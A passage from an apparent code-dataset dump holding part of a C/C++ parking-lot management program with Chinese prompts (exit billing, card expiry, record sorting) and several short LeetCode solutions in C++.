char car[7],time[13],timo[7],timi[7],hourout[5],hourin[5];\r\n long vo,vi,pay;\r\n do\r\n\t{\r\n flag=1;\r\n printf(\"请输入车牌号:\"); // 输入离开的车牌号\r\n scanf(\"%s\",car);\r\n for(i=0;car[i]!='\\0' && flag;i++)\r\n {\r\n if(isalnum(car[i])==0)\r\n flag=0;\r\n }\r\n }while (!flag);\r\n\r\n\tdo\r\n\t{\r\n\t\tflag=1;\r\n\t\tprintf(\"请输入出场时间(省略':'精确到分):\");\t\t//读入正确时间\r\n\t\tscanf(\"%s\",time);\r\n\t\tif(strlen(time)!=12)\r\n\t\t\tflag=0;\r\n\t\tfor(i=0;time[i]!='\\0' && flag;i++)\r\n\t\t{\r\n\t\t\tif(isdigit(time[i])==0)\r\n\t\t\t\tflag=0;\r\n\t\t}\r\n\t}while(!flag);\r\n\r\n\tfor(i=0;i<m;i++)\t\t\t\t\t\t\t\t\t\t//检索该车牌的车主,并确定是车1还是车2\r\n\t{\r\n if(strcmp(user[i].carid1,car)==0)\r\n {\r\n tag=1;\r\n break;\r\n }\r\n else if(strcmp(user[i].carid2,car)==0)\r\n {\r\n tag=2;\r\n break;\r\n }\r\n }\r\n\tif(!tag)\r\n\t\tflag=0;\r\n\r\n\tif(flag)\r\n\t{\r\n\t\tstrncpy(timo,time+2,6);\r\n\t\tstrncpy(hourout,time+8,4);\r\n\t\tvo=atol(timo);\r\n\t\thoursout=atoi(hourout);\r\n\r\n\t\tif(strcmp(user[i].card,\"year\")==0) \r\n\t\t{// 年卡用户,如果出场时间未到有效截止期。对于vip状态的车,直接设置为车辆未进入;\t\t\t\r\n\t\t\tif(tag==1) // tag代表等待离开的是车主的几号车\r\n\t\t\t{\r\n\t\t\t\tif(strcmp(user[i].car1in,\"vip\")==0) \r\n\t\t\t\t{\r\n\t\t\t\t\tif(vo<user[i].valid)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tstrcpy(user[i].car1in,\"车辆未进入\");\r\n\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t}\r\n\r\n\t\t\t\t\telse \r\n\t\t\t\t\t{ // 如果超过截止期,用出场日期到截止期的time差计费,如果另一辆车未进入,直接删除该用户,否则暂时保留\r\n\r\n\t\t\t\t\t\tpay=fee(user[i].valid,0,vo,hoursout);\r\n\t\t\t\t\t\tif(strcmp(user[i].car2in,\"无车辆\")==0 || strcmp(user[i].car2in,\"车辆未进场\")==0)\r\n\t\t\t\t\t\t{\tfor(j=i;j<m;j++) //删除过期用户\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].id,user[j+1].id);\r\n\t\t\t\t\t\t\t\tuser[j].valid=user[j+1].valid;\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].card,user[j+1].card);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].carid1,user[j+1].carid1);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].carid2,user[j+1].carid2);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].car1in,user[j+1].car1in);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].car2in,user[j+1].car2in);\r\n\t\t\t\t\t\t\t};\r\n\t\t\t\t\t\t\tm=m-1;\r\n\t\t\t\t\t\t\tprintf(\"由于您的用户卡已到期,您需要缴纳的费用为:%ld\\n\",pay);\r\n\t\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t{\t\r\n\t\t\t\t\t\t\tstrcpy(user[i].car1in,\"车辆未进入\");\r\n\t\t\t\t\t\t\tprintf(\"由于您的用户卡已到期,您需要缴纳的费用为:%ld\\n\",pay);\r\n\t\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t};\r\n\t\t\t\t}\r\n\t\t\t\telse if(strcmp(user[i].car1in,\"vip\")!=0) // 对于非vip状态的用户,直接利用 time差 计费\r\n\t\t\t\t{\r\n\t\t\t\t\tstrncpy(timi,user[i].car1in+2,6);\r\n\t\t\t\t\tstrncpy(hourin,user[i].car1in+8,4);\r\n\t\t\t\t\tvi=atol(timi);\r\n\t\t\t\t\thoursin=atoi(hourin);\r\n\t\t\t\t\tpay=fee(vi,hoursin,vo,hoursout);\r\n\r\n\t\t\t\t\tif(vo<user[i].valid)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tstrcpy(user[i].car1in,\"车辆未进入\");\r\n\t\t\t\t\t\tprintf(\"您需要缴纳的费用为:%ld\\n\",pay);\r\n\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t}\r\n\t\t\t\t\telse \r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tif(strcmp(user[i].car2in,\"无车辆\")==0 || strcmp(user[i].car2in,\"车辆未进场\")==0)\r\n\t\t\t\t\t\t{\tfor(j=i;j<m;j++) //删除过期用户\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].id,user[j+1].id);\r\n\t\t\t\t\t\t\t\tuser[j].valid=user[j+1].valid;\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].card,user[j+1].card);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].carid1,user[j+1].carid1);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].carid2,user[j+1].carid2);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].car1in,user[j+1].car1in);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].car2in,user[j+1].car2in);\r\n\t\t\t\t\t\t\t};\r\n\t\t\t\t\t\t\tm=m-1;\r\n\t\t\t\t\t\t\tprintf(\"您需要缴纳的费用为:%ld\\n\",pay);\r\n\t\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t{\tstrcpy(user[i].car1in,\"车辆未进入\");\r\n\t\t\t\t\t\t\tprintf(\"您需要缴纳的费用为:%ld\\n\",pay);\r\n\t\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\r\n\t\t\telse if(tag==2)\r\n\t\t\t{\r\n\t\t\t\tif(strcmp(user[i].car2in,\"vip\")==0)\r\n\t\t\t\t{\r\n\t\t\t\t\tif(vo<user[i].valid)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tstrcpy(user[i].car2in,\"车辆未进入\");\r\n\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t}\r\n\t\t\t\t\telse\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tpay=fee(user[i].valid,0,vo,hoursout);\r\n\t\t\t\t\t\tif(strcmp(user[i].car1in,\"无车辆\")==0 || strcmp(user[i].car1in,\"车辆未进场\")==0)\r\n\t\t\t\t\t\t{\t\r\n\t\t\t\t\t\t\tfor(j=i;j<m;j++) //删除过期用户\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].id,user[j+1].id);\r\n\t\t\t\t\t\t\t\tuser[j].valid=user[j+1].valid;\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].card,user[j+1].card);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].carid1,user[j+1].carid1);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].carid2,user[j+1].carid2);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].car1in,user[j+1].car1in);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].car2in,user[j+1].car2in);\r\n\t\t\t\t\t\t\t};\r\n\t\t\t\t\t\t\tm=m-1;\r\n\t\t\t\t\t\t\tprintf(\"由于您的用户卡已到期,您需要缴纳的费用为:%ld\\n\",pay);\r\n\t\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tstrcpy(user[i].car2in,\"车辆未进入\");\r\n\t\t\t\t\t\t\tprintf(\"由于您的用户卡已到期,您需要缴纳的费用为:%ld\\n\",pay);\r\n\t\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t};\r\n\t\t\t\t}\r\n\t\t\t\telse if(strcmp(user[i].car2in,\"vip\")!=0)\r\n\t\t\t\t{\r\n\t\t\t\t\tstrncpy(timi,user[i].car2in+2,6);\r\n\t\t\t\t\tstrncpy(hourin,user[i].car2in+8,4);\r\n\t\t\t\t\tvi=atol(timi);\r\n\t\t\t\t\thoursin=atoi(hourin);\r\n\t\t\t\t\tpay=fee(vi,hoursin,vo,hoursout);\r\n\r\n\t\t\t\t\tif(vo<user[i].valid)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tstrcpy(user[i].car2in,\"车辆未进入\");\r\n\t\t\t\t\t\tprintf(\"您需要缴纳的费用为:%ld\\n\",pay);\r\n\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t}\r\n\t\t\t\t\telse\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tif(strcmp(user[i].car1in,\"无车辆\")==0 || strcmp(user[i].car1in,\"车辆未进场\")==0)\r\n\t\t\t\t\t\t{\t\r\n\t\t\t\t\t\t\tfor(j=i;j<m;j++) //删除过期用户\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].id,user[j+1].id);\r\n\t\t\t\t\t\t\t\tuser[j].valid=user[j+1].valid;\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].card,user[j+1].card);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].carid1,user[j+1].carid1);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].carid2,user[j+1].carid2);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].car1in,user[j+1].car1in);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].car2in,user[j+1].car2in);\r\n\t\t\t\t\t\t\t};\r\n\t\t\t\t\t\t\tm=m-1;\r\n\t\t\t\t\t\t\tprintf(\"您需要缴纳的费用为:%ld\\n\",pay);\r\n\t\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t{\tstrcpy(user[i].car2in,\"车辆未进入\");\r\n\t\t\t\t\t\t\tprintf(\"您需要缴纳的费用为:%ld\\n\",pay);\r\n\t\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\telse if(strcmp(user[i].card,\"time\")==0) // 次卡未用完,操作同年卡\r\n\t\t{\r\n\t\t\tif(tag==1)\r\n\t\t\t{\r\n\t\t\t\tif(strcmp(user[i].car1in,\"vip\")==0)\r\n\t\t\t\t{\r\n\t\t\t\t\tif(user[i].valid==1)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tif(strcmp(user[i].car2in,\"无车辆\")==0 || strcmp(user[i].car2in,\"车辆未进场\")==0)\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tfor(j=i;j<m;j++) //删除过期用户\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].id,user[j+1].id);\r\n\t\t\t\t\t\t\t\tuser[j].valid=user[j+1].valid;\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].card,user[j+1].card);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].carid1,user[j+1].carid1);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].carid2,user[j+1].carid2);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].car1in,user[j+1].car1in);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].car2in,user[j+1].car2in);\r\n\t\t\t\t\t\t\t};\r\n\t\t\t\t\t\t\tm=m-1;\r\n\t\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tuser[i].valid=user[i].valid-1;\r\n\t\t\t\t\t\t\tstrcpy(user[i].car1in,\"车辆未进入\");\t\r\n\t\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\r\n\t\t\t\t\telse\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tuser[i].valid=user[i].valid-1;\r\n\t\t\t\t\t\tstrcpy(user[i].car1in,\"车辆未进入\");\r\n\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\r\n\t\t\t\telse if(strcmp(user[i].car1in,\"vip\")!=0)\r\n\t\t\t\t{\r\n\t\t\t\t\tstrncpy(timi,user[i].car1in+2,6);\r\n\t\t\t\t\tstrncpy(hourin,user[i].car1in+8,4);\r\n\t\t\t\t\tvi=atol(timi);\r\n\t\t\t\t\thoursin=atoi(hourin);\r\n\t\t\t\t\tpay=fee(vi,hoursin,vo,hoursout);\r\n\t\t\t\t\tif(user[i].valid==0)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tfor(j=i;j<m;j++) //删除过期用户\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tstrcpy(user[j].id,user[j+1].id);\r\n\t\t\t\t\t\t\tuser[j].valid=user[j+1].valid;\r\n\t\t\t\t\t\t\tstrcpy(user[j].card,user[j+1].card);\r\n\t\t\t\t\t\t\tstrcpy(user[j].carid1,user[j+1].carid1);\r\n\t\t\t\t\t\t\tstrcpy(user[j].carid2,user[j+1].carid2);\r\n\t\t\t\t\t\t\tstrcpy(user[j].car1in,user[j+1].car1in);\r\n\t\t\t\t\t\t\tstrcpy(user[j].car2in,user[j+1].car2in);\r\n\t\t\t\t\t\t};\r\n\t\t\t\t\t\tm=m-1;\r\n\t\t\t\t\t\tprintf(\"您需要缴纳的费用为:%ld\\n\",pay);\r\n\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t}\r\n\t\t\t\t\telse\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tstrcpy(user[i].car1in,\"车辆未进入\");\r\n\t\t\t\t\t\tprintf(\"您需要缴纳的费用为:%ld\\n\",pay);\r\n\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\r\n\t\t\telse if(tag==2)\r\n\t\t\t{\r\n\t\t\t\tif(strcmp(user[i].car2in,\"vip\")==0)\r\n\t\t\t\t{\r\n\t\t\t\t\tif(user[i].valid==1)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tif(strcmp(user[i].car1in,\"无车辆\")==0 || strcmp(user[i].car1in,\"车辆未进场\")==0)\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tfor(j=i;j<m;j++) //删除过期用户\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].id,user[j+1].id);\r\n\t\t\t\t\t\t\t\tuser[j].valid=user[j+1].valid;\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].card,user[j+1].card);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].carid1,user[j+1].carid1);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].carid2,user[j+1].carid2);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].car1in,user[j+1].car1in);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].car2in,user[j+1].car2in);\r\n\t\t\t\t\t\t\t};\r\n\t\t\t\t\t\t\tm=m-1;\r\n\t\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tuser[i].valid=user[i].valid-1;\r\n\t\t\t\t\t\t\tstrcpy(user[i].car2in,\"车辆未进入\");\r\n\t\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\r\n\t\t\t\t\telse\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tuser[i].valid=user[i].valid-1;\r\n\t\t\t\t\t\tstrcpy(user[i].car2in,\"车辆未进入\");\r\n\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\r\n\t\t\t\telse if(strcmp(user[i].car2in,\"vip\")!=0)\r\n\t\t\t\t{\r\n\t\t\t\t\tstrncpy(timi,user[i].car2in+2,6);\r\n\t\t\t\t\tstrncpy(hourin,user[i].car2in+8,4);\r\n\t\t\t\t\tvi=atol(timi);\r\n\t\t\t\t\thoursin=atoi(hourin);\r\n\t\t\t\t\tpay=fee(vi,hoursin,vo,hoursout);\r\n\r\n\t\t\t\t\tif(user[i].valid==0)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tfor(j=i;j<m;j++) //删除过期用户\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tstrcpy(user[j].id,user[j+1].id);\r\n\t\t\t\t\t\t\tuser[j].valid=user[j+1].valid;\r\n\t\t\t\t\t\t\tstrcpy(user[j].card,user[j+1].card);\r\n\t\t\t\t\t\t\tstrcpy(user[j].carid1,user[j+1].carid1);\r\n\t\t\t\t\t\t\tstrcpy(user[j].carid2,user[j+1].carid2);\r\n\t\t\t\t\t\t\tstrcpy(user[j].car1in,user[j+1].car1in);\r\n\t\t\t\t\t\t\tstrcpy(user[j].car2in,user[j+1].car2in);\r\n\t\t\t\t\t\t};\r\n\t\t\t\t\t\tm=m-1;\r\n\t\t\t\t\t\tprintf(\"您需要缴纳的费用为:%ld\\n\",pay);\r\n\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t}\r\n\t\t\t\t\telse\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tstrcpy(user[i].car2in,\"车辆未进入\");\r\n\t\t\t\t\t\tprintf(\"您需要缴纳的费用为:%ld\\n\",pay);\r\n\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\telse if(strcmp(user[i].card,\"temp\")==0)\r\n\t\t{\r\n\t\t\tstrncpy(timi,user[i].car1in+2,6);\r\n\t\t\tstrncpy(hourin,user[i].car1in+8,4);\r\n\t\t\tvi=atol(timi);\r\n\t\t\thoursin=atoi(hourin);\r\n\t\t\tpay=fee(vi,hoursin,vo,hoursout);\r\n\r\n\t\t\tfor(j=i;j<m;j++) //删除过期用户\r\n\t\t\t{\r\n\t\t\t\tstrcpy(user[j].id,user[j+1].id);\r\n\t\t\t\tuser[j].valid=user[j+1].valid;\r\n\t\t\t\tstrcpy(user[j].card,user[j+1].card);\r\n\t\t\t\tstrcpy(user[j].carid1,user[j+1].carid1);\r\n\t\t\t\tstrcpy(user[j].carid2,user[j+1].carid2);\r\n\t\t\t\tstrcpy(user[j].car1in,user[j+1].car1in);\r\n\t\t\t\tstrcpy(user[j].car2in,user[j+1].car2in);\r\n\t\t\t};\r\n\t\t\tm=m-1;\r\n\t\t\tprintf(\"您需要缴纳的费用为:%ld\\n\",pay);\r\n\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t}\r\n\t\tsave(m);\r\n\t}\r\n\telse\r\n\t\tprintf(\"未查找到该车辆!\");\r\n};\r\n\r\nbool cmp_id(USER a,USER b){return strcmp(a.id,b.id)<0;}\r\nbool cmp_card(USER a,USER b){return strcmp(a.card,b.card)<0;}\r\nbool cmp_v(USER a,USER b){return a.valid<b.valid;}\r\nbool cmp_car(USER a,USER b){return strcmp(a.carid1,b.carid1)<0;}\r\nbool cmp_in(USER a,USER b){return strcmp(a.car1in,b.car1in)<0;}\r\n\r\nvoid sort(){\r\n\tFILE* fp;\r\n\tint m=load();\r\n\tint i,j,k,s1,s2,flag;\r\n\tdo\r\n\t{\r\n\t\tprintf(\"1.用户ID 2.卡类型 3.有效日期/有效次数 4.车牌号 5.入场时间 6.放弃排序\\n\");\r\n\t printf(\"您要对那种字段排序?请输入其对应的代号:\");\r\n\t scanf(\"%d\",&s1);\r\n\t if(s1<1 || s1>6)\r\n\t\t{\r\n\t\t\tprintf(\"输入不合法,请重新输入:\");\r\n\t\t\tscanf(\"%d\",&s1);\r\n\t\t\tflag=0;\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\tflag=1;\r\n\t\t\tbreak;\r\n\t\t}\r\n\t}while(!flag);\r\n\r\n\tswitch(s1)\r\n\t{\r\n\tcase 1: // 按id排序\r\n\t\tstd::sort(user,user+m,cmp_id);\r\n\t\tbreak;\r\n\tcase 2: //按卡类型排序\r\n\t\tstd::sort(user,user+m,cmp_card);\r\n\t\tbreak;\r\n\tcase 3: //按有效期排序\r\n\t\tstd::sort(user,user+m,cmp_v);\r\n\t\tbreak;\r\n\tcase 4: // 按车牌号排序\r\n\t\tstd::sort(user,user+m,cmp_car);\r\n\t\tbreak;\r\n\tcase 5: // 按入场时间排序\r\n\t\tstd::sort(user,user+m,cmp_in);\r\n\t\tbreak;\r\n\tdefault:return;\r\n\t}\r\n\tprintf(\"降序排列选择1,升序排列选择2:\");\r\n\tscanf(\"%d\",&s2);\r\n\tif(s2==1)\r\n\t{\r\n\t\tfor(i=m-1;i>=0;i--){\r\n\t\t\tprintf(\"\\t%s,\\t%s,\\t%d,\\t%s,\\t%s,\\t%s,\\t%s\\n\",user[i].id,user[i].card,user[i].valid,user[i].carid1,user[i].carid2,user[i].car1in,user[i].car2in);\r\n\t\t}\r\n\t}\r\n\telse if(s2==2)\r\n\t{\r\n\t\tfor(i=0;i<m;i++)\r\n\t\t\tprintf(\"\\t%s,\\t%s,\\t%d,\\t%s,\\t%s,\\t%s,\\t%s\\n\",user[i].id,user[i].card,user[i].valid,user[i].carid1,user[i].carid2,user[i].car1in,user[i].car2in);\r\n\t};\r\n};\r\n\r\n\r\n" }, { "alpha_fraction": 0.5014641284942627, "alphanum_fraction": 0.5065885782241821, "avg_line_length": 24.30769157409668, "blob_id": "9763e12cee4897f6caa7391a59f669ebb85657a4", "content_id": "210156a721f0d350e7f36d5f1f99742cb86294ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1384, "license_type": "no_license", "max_line_length": 90, "num_lines": 52, "path": "/leetcode/leetcode938.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 938. 二叉搜索树的范围和\r\n\r\nstruct TreeNode {\r\n int val;\r\n TreeNode *left;\r\n TreeNode *right;\r\n TreeNode() : val(0), left(nullptr), right(nullptr) {}\r\n TreeNode(int x) : val(x), left(nullptr), right(nullptr) {}\r\n TreeNode(int x, TreeNode *left, TreeNode *right) : val(x), left(left), right(right) {}\r\n};\r\n\r\nclass Solution {\r\npublic:\r\n void midOrder(TreeNode *root,vector<int> &res){\r\n if(!root) return;\r\n midOrder(root->left, res);\r\n res.push_back(root->val);\r\n midOrder(root->right, res);\r\n }\r\n int rangeSumBST(TreeNode* root, int low, int high) {\r\n int cnt = 0;\r\n vector<int> vec;\r\n midOrder(root,vec);\r\n for(int i = 0; i < vec.size() && vec[i] <= high; i++){\r\n if(vec[i] >= low){\r\n cnt += vec[i];\r\n }\r\n }\r\n return cnt;\r\n }\r\n};\r\n\r\nclass Solution {\r\npublic:\r\n int cnt = 0, l, h;\r\n void midOrder(TreeNode *root){\r\n if(!root) return;\r\n midOrder(root->left);\r\n if(root->val >= l && root->val <= h){\r\n cnt += root->val;\r\n } else if(root->val > h) return;\r\n midOrder(root->right);\r\n }\r\n int rangeSumBST(TreeNode* root, int low, int high) {\r\n l = low, h = high;\r\n midOrder(root);\r\n return cnt;\r\n }\r\n};" }, { "alpha_fraction": 0.4268292784690857, "alphanum_fraction": 0.4481707215309143, "avg_line_length": 18.625, "blob_id": "04746ccc57a770036d9337946a961c2a595117b9", "content_id": "344e53b55392be5e4ab1aa67bfb7ceefea54c8dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 338, "license_type": "no_license", "max_line_length": 41, "num_lines": 16, "path": "/leetcode/leetcode344.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 344. 反转字符串\r\n\r\nclass Solution {\r\npublic:\r\n void reverseString(vector<char>& s) {\r\n int size = s.size();\r\n for(int i = 0; i < size/2; i++){\r\n char c = s[i];\r\n s[i] = s[size-i-1];\r\n s[size-i-1] = c;\r\n }\r\n }\r\n};" }, { "alpha_fraction": 0.3904418349266052, "alphanum_fraction": 0.4138863980770111, "avg_line_length": 24.404762268066406, "blob_id": "4854f761625a9da358d54847eb0e18eca7d0e91f", "content_id": "7c84e2a4cbc6872e5b4a2562be681f28c1591610", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1117, "license_type": "no_license", "max_line_length": 59, "num_lines": 42, "path": "/leetcode/leetcode2.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 2.两数相加\r\n\r\nstruct ListNode {\r\n int val;\r\n ListNode *next;\r\n ListNode() : val(0), next(nullptr) {}\r\n ListNode(int x) : val(x), next(nullptr) {}\r\n ListNode(int x, ListNode *next) : val(x), next(next) {}\r\n};\r\n\r\nclass Solution {\r\npublic:\r\n ListNode* addTwoNumbers(ListNode* l1, ListNode* l2) {\r\n ListNode *head = nullptr, *temp = head;\r\n int carry = 0, sum = 0;\r\n while(l1 != nullptr || l2 != nullptr || carry == 1)\r\n {\r\n if(l1 != nullptr){\r\n sum += l1->val;\r\n l1 = l1->next;\r\n }\r\n if(l2 != nullptr){\r\n sum += l2->val;\r\n l2 = l2->next;\r\n }\r\n sum += carry;\r\n if(!head) {\r\n head = temp = new ListNode(sum%10);\r\n carry = sum/10;\r\n } else {\r\n temp->next = new ListNode(sum%10);\r\n carry = sum/10;\r\n temp = temp->next;\r\n }\r\n sum = 0;\r\n }\r\n return head;\r\n }\r\n};\r\n" }, { "alpha_fraction": 0.41961851716041565, "alphanum_fraction": 0.4291553199291229, "avg_line_length": 25.259260177612305, "blob_id": "4d50bacb15da514d08ed2bb375c2fd24a3c0ca80", "content_id": "5549e2b4d8771803bc6752e059814bad39b9f973", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 746, "license_type": "no_license", "max_line_length": 72, "num_lines": 27, "path": "/leetcode/leetcode819.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 819. 最常见的单词\r\n\r\nclass Solution {\r\npublic:\r\n string mostCommonWord(string paragraph, vector<string>& banned) {\r\n unordered_map<string,int>mp,ban;\r\n string res, tmp;\r\n int cnt = 0;\r\n for(int i = 0; i < banned.size(); i++){\r\n ban[banned[i]]++;\r\n }\r\n for(int i = 0; i <= paragraph.size(); i++){\r\n while(isalpha(paragraph[i])) tmp += tolower(paragraph[i++]);\r\n if(ban[tmp] != 1 && tmp != \"\"){\r\n if(cnt < ++mp[tmp]){\r\n cnt = mp[tmp];\r\n res = tmp;\r\n }\r\n }\r\n tmp.clear();\r\n }\r\n return res;\r\n }\r\n};" }, { "alpha_fraction": 0.3715847134590149, "alphanum_fraction": 0.3846994638442993, "avg_line_length": 25.787878036499023, "blob_id": "9ad0bfc88e48acd22bfa1b88a14593156b614b24", "content_id": "319d2544e5a22b6f77703d17786e93256f35b940", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 931, "license_type": "no_license", "max_line_length": 66, "num_lines": 33, "path": "/leetcode/leetcode16.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 16.最接近的三数之和\r\n\r\nclass Solution {\r\npublic:\r\n int threeSumClosest(vector<int>& nums, int target) {\r\n int res = 20000;\r\n sort(nums.begin(), nums.end());\r\n int i = 0;\r\n while (i < nums.size())\r\n {\r\n int left = i+1, right = nums.size()-1;\r\n while(left < right)\r\n {\r\n int temp = nums[i] + nums[left] + nums[right];\r\n if(abs(temp-target) < abs(res-target)){\r\n res = temp;\r\n }\r\n if(temp == target){\r\n i = nums.size();\r\n break;\r\n } else if(temp > target){\r\n right--;\r\n } else left++;\r\n }\r\n while(i < nums.size()-2 && nums[i] == nums[i+1]){i++;}\r\n i++;\r\n }\r\n return res;\r\n }\r\n};" }, { "alpha_fraction": 0.4316239356994629, "alphanum_fraction": 0.44871795177459717, "avg_line_length": 22.736841201782227, "blob_id": "684034e1811754607e34254aaf89f46f29183b6c", "content_id": "0ce763531aba0f3686fe139e8e9b8d827be5609a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 486, "license_type": "no_license", "max_line_length": 46, "num_lines": 19, "path": "/leetcode/leetcode657.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 657. 机器人能否返回原点\r\n\r\nclass 